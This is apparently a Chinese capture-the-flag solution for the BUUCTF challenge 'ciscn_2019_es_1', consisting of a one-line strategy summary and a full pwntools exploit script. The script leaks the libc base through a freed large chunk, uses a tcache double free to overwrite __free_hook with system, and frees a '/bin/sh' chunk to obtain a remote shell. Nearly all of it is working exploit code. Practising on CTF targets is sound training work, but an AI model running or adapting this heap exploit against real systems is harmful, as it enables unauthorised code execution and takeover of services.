思路就是构造一个largebin释放之后求出mian_arena,然后算出偏移,打free_hook
from pwn import*
p = remote("node3.buuoj.cn",25789)
#p = process("./ciscn_2019_es_1")
#context.log_level = 'debug'
def add(size,name,call):
p.recv()
p.sendline("1")
p.recv()
p.sendline(str(size))
p.recv()
p.sendline(name)
p.recv()
p.send(call)
def free(idx):
p.recv()
p.sendline("3")
p.recv()
p.sendline(str(idx))
def show(idx):
p.recv()
p.sendline("2")
p.recv()
p.sendline(str(idx))
add(0x500,"aaaa","bbbb")
add(0x60,"/bin/sh\x00","aaaa")
add(0x60,"aaaa","bbbb")
free(0)
show(0)
main_arena = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))-96
log.success("main_arena:"+hex(main_arena))
base = main_arena- 0x3ebc40
log.success("base:"+hex(base))
free_hook = base+0x3ed8e8
log.success("free_hook:"+hex(free_hook))
sys_addr = base+0x4f440
add(0x500,"aaaa","bbbb")
free(2)
free(2)
add(0x60,p64(free_hook),"a")
add(0x60,p64(free_hook),'a')
add(0x60,p64(sys_addr),"a")
free(1)
#gdb.attach(p)
p.interactive()
网友评论